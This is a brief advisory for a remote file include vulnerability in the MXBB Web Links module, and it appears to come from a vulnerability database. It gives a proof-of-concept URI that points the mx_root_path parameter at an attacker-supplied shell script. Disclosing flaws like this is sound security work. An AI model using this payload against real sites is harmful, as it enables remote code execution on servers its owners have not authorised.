MXBB Web Links Module MX_Root_Path Remote File Include Vulnerability

MXBB Web Links Module MX_Root_Path Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/modules/mx_links/language/lang_english/lang_admin.php?mx_root_path=[shell]